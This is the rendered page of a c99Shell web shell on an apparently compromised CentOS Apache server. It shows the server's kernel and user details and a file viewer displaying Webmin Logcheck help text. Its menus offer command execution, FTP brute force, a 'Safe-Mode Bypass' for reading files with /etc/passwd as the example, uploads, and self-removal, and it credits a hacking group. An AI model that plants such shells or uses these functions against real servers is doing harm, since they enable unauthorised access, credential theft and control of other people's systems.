!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/sentry/help/   drwxr-xr-x
Free 53.75 GB of 127.8 GB (42.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     logcheck.html (1.24 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Logcheck Configuration
Logcheck is a program that automatically monitors your system logfiles on a regular basis and emails security violations to you. It looks for messages generated by various programs (including Portsentry and Hostsentry) that indicate a hacking attempt, and generates a report which is emailed to the chosen address.

The options on this page are :

  • Email reports to
    The email address to which security violation reports and sent.

  • Hacking log messages
    A list of messages which if found in one of the system log files indicate a hacking attempt.

  • Violation log messages
    A list of messages that indicate a potential security violation. Any message that is on this list but also in the 'Except for' list below it will be ignored.

  • Ignored log messages
    Any log message listed in this field will always be ignored, even if it matches one of the hacking or violation message strings.

At the bottom of the page is a form for choosing exactly when Logcheck should be run. However, if your Logcheck install uses a Cron script that forces it to be run hourly or daily, this form will not be displayed.


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0123 ]--